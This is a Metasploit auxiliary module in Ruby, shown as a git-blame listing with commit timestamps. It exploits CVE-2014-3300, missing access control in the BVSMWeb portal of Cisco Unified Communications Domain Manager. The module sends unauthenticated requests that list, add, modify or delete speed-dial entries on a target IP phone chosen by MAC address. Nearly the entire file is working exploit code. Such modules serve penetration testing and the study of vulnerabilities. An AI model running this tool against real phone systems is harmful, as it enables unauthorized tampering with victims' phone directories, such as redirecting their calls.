2014-10-24 00:46:52 +00:00
|
|
|
##
|
2017-07-24 13:26:21 +00:00
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
2014-10-24 00:46:52 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'rexml/document'
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Auxiliary
|
2014-10-24 00:46:52 +00:00
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
|
2015-01-10 06:32:10 +00:00
|
|
|
def initialize(info={})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'Viproy CUCDM IP Phone XML Services - Speed Dial Attack Tool',
|
|
|
|
'Description' => %q{
|
2015-01-10 07:10:08 +00:00
|
|
|
The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager
|
|
|
|
(CDM), before version 10, doesn't implement access control properly, which allows remote
|
|
|
|
attackers to modify user information. This module exploits the vulnerability to make
|
2017-08-29 00:17:58 +00:00
|
|
|
unauthorized speed dial entity manipulations.
|
2014-10-24 00:46:52 +00:00
|
|
|
},
|
2015-01-10 06:32:10 +00:00
|
|
|
'Author' => 'fozavci',
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
['CVE', '2014-3300'],
|
|
|
|
['BID', '68331']
|
|
|
|
],
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Actions' =>
|
|
|
|
[
|
|
|
|
[ 'List', { 'Description' => 'Getting the speeddials for the MAC address' } ],
|
|
|
|
[ 'Modify', { 'Description' => 'Modifying a speeddial for the MAC address' } ],
|
|
|
|
[ 'Add', { 'Description' => 'Adding a speeddial for the MAC address' } ],
|
|
|
|
[ 'Delete', { 'Description' => 'Deleting a speeddial for the MAC address' } ]
|
|
|
|
],
|
2014-10-28 03:11:07 +00:00
|
|
|
'DefaultAction' => 'List'
|
2015-01-10 06:32:10 +00:00
|
|
|
))
|
2014-10-24 00:46:52 +00:00
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptString.new('TARGETURI', [ true, 'Target URI for XML services', '/bvsmweb']),
|
|
|
|
OptString.new('MAC', [ true, 'MAC Address of target phone', '000000000000']),
|
|
|
|
OptString.new('NAME', [ false, 'Name for Speed Dial', 'viproy']),
|
|
|
|
OptString.new('POSITION', [ false, 'Position for Speed Dial', '1']),
|
|
|
|
OptString.new('TELNO', [ false, 'Phone number for Speed Dial', '007']),
|
2017-05-03 20:42:21 +00:00
|
|
|
])
|
2014-10-24 00:46:52 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def run
|
|
|
|
|
2014-10-28 02:53:13 +00:00
|
|
|
case action.name.upcase
|
2014-10-24 00:46:52 +00:00
|
|
|
when 'MODIFY'
|
2015-01-10 07:06:56 +00:00
|
|
|
modify
|
2014-10-24 00:46:52 +00:00
|
|
|
when 'DELETE'
|
2015-01-10 07:06:56 +00:00
|
|
|
delete
|
2014-10-24 00:46:52 +00:00
|
|
|
when 'ADD'
|
2015-01-10 07:06:56 +00:00
|
|
|
add
|
|
|
|
when 'LIST'
|
|
|
|
list
|
2014-10-24 00:46:52 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
end
|
|
|
|
|
2015-01-10 06:51:31 +00:00
|
|
|
def send_rcv(uri, vars_get)
|
|
|
|
uri = normalize_uri(target_uri.to_s, uri.to_s)
|
2014-10-24 00:46:52 +00:00
|
|
|
res = send_request_cgi(
|
2015-01-10 06:32:10 +00:00
|
|
|
{
|
|
|
|
'uri' => uri,
|
|
|
|
'method' => 'GET',
|
2015-01-10 06:51:31 +00:00
|
|
|
'vars_get' => vars_get
|
2015-01-10 06:32:10 +00:00
|
|
|
})
|
|
|
|
|
2015-01-10 06:51:31 +00:00
|
|
|
if res && res.code == 200 && res.body && res.body.to_s =~ /Speed [D|d]ial/
|
|
|
|
return Exploit::CheckCode::Vulnerable, res
|
2014-10-24 00:46:52 +00:00
|
|
|
else
|
2016-02-01 22:06:34 +00:00
|
|
|
print_error("Target appears not vulnerable!")
|
2015-01-10 06:51:31 +00:00
|
|
|
return Exploit::CheckCode::Safe, res
|
2014-10-24 00:46:52 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def parse(res)
|
|
|
|
doc = REXML::Document.new(res.body)
|
2015-01-10 06:51:31 +00:00
|
|
|
names = []
|
|
|
|
phones = []
|
2014-10-24 00:46:52 +00:00
|
|
|
|
2015-01-10 06:51:31 +00:00
|
|
|
list = doc.root.get_elements('DirectoryEntry')
|
|
|
|
list.each do |lst|
|
|
|
|
xlist = lst.get_elements('Name')
|
2014-10-24 00:46:52 +00:00
|
|
|
xlist.each {|l| names << "#{l[0]}"}
|
2015-01-10 06:51:31 +00:00
|
|
|
xlist = lst.get_elements('Telephone')
|
2014-10-24 00:46:52 +00:00
|
|
|
xlist.each {|l| phones << "#{l[0]}" }
|
2015-01-10 06:51:31 +00:00
|
|
|
end
|
|
|
|
|
2014-10-24 00:46:52 +00:00
|
|
|
if names.size > 0
|
2015-01-10 06:51:31 +00:00
|
|
|
names.size.times do |i|
|
|
|
|
info = ''
|
|
|
|
info << "Position: #{names[i].split(":")[0]}, "
|
|
|
|
info << "Name: #{names[i].split(":")[1]}, "
|
|
|
|
info << "Telephone: #{phones[i]}"
|
|
|
|
|
2016-02-01 22:06:34 +00:00
|
|
|
print_good("#{info}")
|
2015-01-10 06:51:31 +00:00
|
|
|
end
|
2014-10-24 00:46:52 +00:00
|
|
|
else
|
2016-02-01 22:06:34 +00:00
|
|
|
print_status("No Speed Dial detected")
|
2014-10-24 00:46:52 +00:00
|
|
|
end
|
|
|
|
end
|
2015-01-10 07:06:56 +00:00
|
|
|
|
|
|
|
def list
|
|
|
|
mac = datastore['MAC']
|
|
|
|
|
2016-02-01 22:06:34 +00:00
|
|
|
print_status("Getting Speed Dials of the IP phone")
|
2015-01-10 07:06:56 +00:00
|
|
|
vars_get = {
|
|
|
|
'device' => "SEP#{mac}"
|
|
|
|
}
|
|
|
|
|
|
|
|
status, res = send_rcv('speeddials.cgi', vars_get)
|
|
|
|
parse(res) unless status == Exploit::CheckCode::Safe
|
|
|
|
end
|
|
|
|
|
|
|
|
def add
|
|
|
|
mac = datastore['MAC']
|
|
|
|
name = datastore['NAME']
|
|
|
|
position = datastore['POSITION']
|
|
|
|
telno = datastore['TELNO']
|
|
|
|
|
2016-02-01 22:06:34 +00:00
|
|
|
print_status("Adding Speed Dial to the IP phone")
|
2015-01-10 07:06:56 +00:00
|
|
|
vars_get = {
|
|
|
|
'name' => "#{name}",
|
|
|
|
'telno' => "#{telno}",
|
|
|
|
'device' => "SEP#{mac}",
|
|
|
|
'entry' => "#{position}",
|
|
|
|
'mac' => "#{mac}"
|
|
|
|
}
|
|
|
|
status, res = send_rcv('phonespeedialadd.cgi', vars_get)
|
|
|
|
|
|
|
|
if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Added/
|
2016-02-01 22:06:34 +00:00
|
|
|
print_good("Speed Dial #{position} is added successfully")
|
2015-01-10 07:06:56 +00:00
|
|
|
elsif res && res.body && res.body.to_s =~ /exist/
|
2016-02-01 22:06:34 +00:00
|
|
|
print_error("Speed Dial is exist, change the position or choose modify!")
|
2015-01-10 07:06:56 +00:00
|
|
|
else
|
2016-02-01 22:06:34 +00:00
|
|
|
print_error("Speed Dial couldn't add!")
|
2015-01-10 07:06:56 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def delete
|
|
|
|
mac = datastore['MAC']
|
|
|
|
position = datastore['POSITION']
|
|
|
|
|
2016-02-01 22:06:34 +00:00
|
|
|
print_status("Deleting Speed Dial of the IP phone")
|
2015-01-10 07:06:56 +00:00
|
|
|
|
|
|
|
vars_get = {
|
|
|
|
'entry' => "#{position}",
|
|
|
|
'device' => "SEP#{mac}"
|
|
|
|
}
|
|
|
|
|
|
|
|
status, res = send_rcv('phonespeeddialdelete.cgi', vars_get)
|
|
|
|
|
|
|
|
if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Deleted/
|
2016-02-01 22:06:34 +00:00
|
|
|
print_good("Speed Dial #{position} is deleted successfully")
|
2015-01-10 07:06:56 +00:00
|
|
|
else
|
2016-02-01 22:06:34 +00:00
|
|
|
print_error("Speed Dial is not found!")
|
2015-01-10 07:06:56 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def modify
|
|
|
|
mac = datastore['MAC']
|
|
|
|
name = datastore['NAME']
|
|
|
|
position = datastore['POSITION']
|
|
|
|
telno = datastore['TELNO']
|
|
|
|
|
2016-02-01 22:06:34 +00:00
|
|
|
print_status("Deleting Speed Dial of the IP phone")
|
2015-01-10 07:06:56 +00:00
|
|
|
|
|
|
|
vars_get = {
|
|
|
|
'entry' => "#{position}",
|
|
|
|
'device' => "SEP#{mac}"
|
|
|
|
}
|
|
|
|
|
|
|
|
status, res = send_rcv('phonespeeddialdelete.cgi', vars_get)
|
|
|
|
|
|
|
|
if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Deleted/
|
2016-02-01 22:06:34 +00:00
|
|
|
print_good("Speed Dial #{position} is deleted successfully")
|
|
|
|
print_status("Adding Speed Dial to the IP phone")
|
2015-01-10 07:06:56 +00:00
|
|
|
|
|
|
|
vars_get = {
|
|
|
|
'name' => "#{name}",
|
|
|
|
'telno' => "#{telno}",
|
|
|
|
'device' => "SEP#{mac}",
|
|
|
|
'entry' => "#{position}",
|
|
|
|
'mac' => "#{mac}"
|
|
|
|
}
|
|
|
|
|
|
|
|
status, res = send_rcv('phonespeedialadd.cgi', vars_get)
|
|
|
|
|
|
|
|
if status == Exploit::CheckCode::Vulnerable && res && res.body && res.body.to_s =~ /Added/
|
2016-02-01 22:06:34 +00:00
|
|
|
print_good("Speed Dial #{position} is added successfully")
|
2015-01-10 07:06:56 +00:00
|
|
|
elsif res && res.body =~ /exist/
|
2016-02-01 22:06:34 +00:00
|
|
|
print_error("Speed Dial is exist, change the position or choose modify!")
|
2015-01-10 07:06:56 +00:00
|
|
|
else
|
2016-02-01 22:06:34 +00:00
|
|
|
print_error("Speed Dial couldn't add!")
|
2015-01-10 07:06:56 +00:00
|
|
|
end
|
|
|
|
else
|
2016-02-01 22:06:34 +00:00
|
|
|
print_error("Speed Dial is not found!")
|
2015-01-10 07:06:56 +00:00
|
|
|
end
|
|
|
|
end
|
2014-10-24 00:46:52 +00:00
|
|
|
end
|